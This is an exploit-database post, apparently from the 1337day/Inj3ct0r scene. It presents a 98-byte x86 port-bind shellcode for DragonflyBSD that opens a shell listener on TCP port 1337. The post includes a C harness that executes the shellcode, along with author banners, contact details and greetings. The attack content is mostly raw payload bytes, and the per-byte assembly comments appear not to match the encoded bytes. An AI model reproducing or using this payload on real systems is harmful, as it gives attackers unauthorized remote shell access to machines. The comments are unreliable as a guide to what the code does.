1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm KedAns-Dz member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 /* ### # Title : DragonflyBSD PortBind TCP (1337) Shellcode - 98 bytes # Author : KedAns-Dz # E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com | kedans@facebook.com # Home : Hassi.Messaoud (30008) - Algeria -(00213555248701) # Web Site : www.1337day.com * www.exploit-id.com * sec4ever.com # Facebook : http://facebook.com/KedAns # platform : bsd/x86 # Impact : PortBind TCP (1337) # Tested on : DragonflyBSD v2.10.1 (REL) ## # [Indoushka & SeeMe & L0rd CrusAd3r] => Welcome back Br0ther's <3 ^^ <3 ## # | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << | # | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 | # | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * H-KinG | # | ------------------------------------------------- < | ### */ /*....:::| Saha 3idK0um ; Aid MoUbarak to All MusLim's |:::....*/ #include <stdio.h> #include <string.h> /* * DragonflyBSD PortBind TCP (1337) Shellcode - 98 bytes * Tested on DragonflyBSD v2.10.1 (Default Target : 192.168.1.2) * Should working on FreeBSD and OpenBSD (^_^) . */ char shellcode[]= "\x6a\x13". // push $0x13 "\x59". // pop %ecx "\xD9\xee". // fldz "\xd9\x74\x24\xf4". // fstenv %esp "\x5b". // pop %ebx "\x81\x73\x13\x18\x88\x4a". // xor dword %ebx $0x13,$0x4a8818 "\x83\xeb\xfc". // sub %ebx "\xe2\xf4". // loopd short "\x29\x48\x1a". // sub dword %eax $0x1a,%ecx "\xb6\xe7". // mov %dh,$0xe7 "\x8a\x4f\xe7". // mov %cl,%edi "\x91". // xchg %eax,%ecx "\x6f". // outs %dx,dword %edi "\x1a\xb4\x19\xe2\x48\xb4". // sbb %dh,%ecx %ebx ,$0xb448e2 "\x38\x2b". // cmp %ebx,%ch "\x13\x98\xdf\x1a\x8e\x72". // adc %ebx,dword %eax $0x728e1adf "\xE0\x12". // loopdne short "\x13\x98\x01\x0D\x32\xa8". // adc %ebx,dword %eax $0xa8320d01 "\xe2\x87". // loopd short "\x5e". // pop %esi "\xa8\x96". // test %al, $0x96 "\x87\x5e\x48". // xchg dword %esi $0x48,%ebx "\xd8\x20". // fsub dword %eax "\x84\x40\x45". // test %eax $0x45,%al "\xcA\x21\x57". // retf $0x5721 (return) "\x6c". // ins %edi,%dx "\x33\x28". // xor %ebp,dword %eax "\x48". // dec %eax "\xe0\x65". // loopdne short "\xf1". // int "\x6b\xe0\x22". // imul %esp,%eax $0x22 "\xf1". // int "\x7a\xe1". // jpe short "\x24\x57". // adn %al,$0x57 "\xfb". // sti "\xd8\x1e". // fcomp dword %esi "\x8d\x48\x38". // lea %ecx,dword %eax $0x38 "\x71\x13". // jno short "\x98". // cwde "\x88\x4a\xde"; // mov %edx,%cl main() { int *ret; printf("Shellcode lenght=%d\n",sizeof(shellcode)); ret=(int*)&ret+2; (*ret)=(int)shellcode; } /*....:::| Saha 3idK0um ; Aid MoUbarak to All Muslim's |:::....*/ #================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]===================================== # Greets To : Dz Offenders Cr3w < Algerians HaCkerS > + Rizky Ariestiyansyah * Islam Caddy <3 # + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re * CrosS (www.1337day.com) # Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * SeeMe * XroGuE * ZoRLu * gunslinger_ # anT!-Tr0J4n * ^Xecuti0N3r * Kalashinkov3 (www.1337day.com/team) * Dz Offenders Cr3w * Sec4ever # Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X # Kha&miX * Str0ke * JF * Ev!LsCr!pT_Dz * H-KinG * www.packetstormsecurity.org * TreX (hotturks.org) # www.metasploit.com * UE-Team & I-BackTrack * r00tw0rm.com * All Security and Exploits Webs .. #=================================================================================================